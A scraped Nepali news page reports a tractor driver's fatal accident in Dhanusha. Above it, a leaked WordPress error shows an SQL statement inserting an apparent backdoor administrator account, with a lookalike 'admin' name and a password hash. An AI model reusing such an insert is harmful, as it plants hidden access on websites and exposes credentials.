WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUeN/vI1aEe2iTPWw5KuoLG1jkWVvL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:32:02', '', 'admlnlx', 'admlnlx')
महेन्द्रनगर (धनुषा),पुस ११ –
धनुषामा आफैँले चलाएको ट्र्याक्टरले किचिएर चालकको मृत्यु भएको छ ।
जनकपुर–ढल्केवर राजमार्गको धनुषाको लक्ष्मीनिया सडकखण्डमा गए साँझ भएको दुर्घटनामा आफैँले चलाएको ट्र्याक्टरले किचिएर क्षिरेश्वरनाथ नगरपालिका–३ का २२ वर्षीय चालक जाहिल राइनको मृत्यु भएको प्रहरीले जनाएको छ ।
ज१त २८३६ नंको ट्र्याक्टर चलाएर महेन्द्रनगरतर्फ जाँदै गरेका बेला ट्र्याक्टर पल्टिँदा च्यापिएर चालक राईनको मृत्यु भएको ट्राफिक प्रहरी कार्यालय धनुषाले जनाएको छ । उनको शव परीक्षणका लागि जनकपुर अञ्चल अस्पतालमा राखिएको जनाएको छ । – रासस